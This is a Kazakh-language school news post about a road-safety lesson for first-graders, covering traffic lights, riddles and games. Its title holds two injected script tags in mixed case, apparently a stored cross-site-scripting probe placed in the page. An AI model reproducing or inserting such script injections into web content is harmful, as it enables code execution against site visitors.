Қауіпсіздік әліппесі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

31.03.2022

 

28 наурызда көктемгі каникул кезеңінде іс-шараларды өткізу шеңберінде 1-сыныпта "Қауіпсіздік әліппесі"ЖҚЕ бойынша іс-шара өтті. Мақсаты: кіші мектеп оқушыларының көшелер мен жолдарда жүру кезіндегі жол қозғалысы қауіпсіздігі туралы түсінігін қалыптастыру. Міндеттері: - көше жағдайында жаяу жүргіншінің жол қозғалысы ережелері туралы балалардың білімін кеңейту үшін жағдай жасау; - бағдаршамдар мен олардың сигналдары туралы білімдерін қайталау және бекіту, бағдаршамдарды ойлап табу тарихымен таныстыру; бағдаршам сигналдарының маңыздылығын балалардың санасына жеткізу;  - зейінді, кеңістікте бағдарлау дағдыларын, алған білімдерін күнделікті өмірде өз бетінше пайдалана білуге тәрбиелеу. Іс-шара барысында балалар сұрақтарға жауап берді, жұмбақтар шешті, ойын ойнады, жол белгілерінің пайда болуы туралы әңгімені тыңдады, жұппен жұмыс істеді.  Нәтижесінде балаларға жол қозғалысы ережелері бойынша түрлі-түсті жадынамалар таратылды.

Просмотров: 483


Пікір қосу



Деректерді қолтаңбаға қосу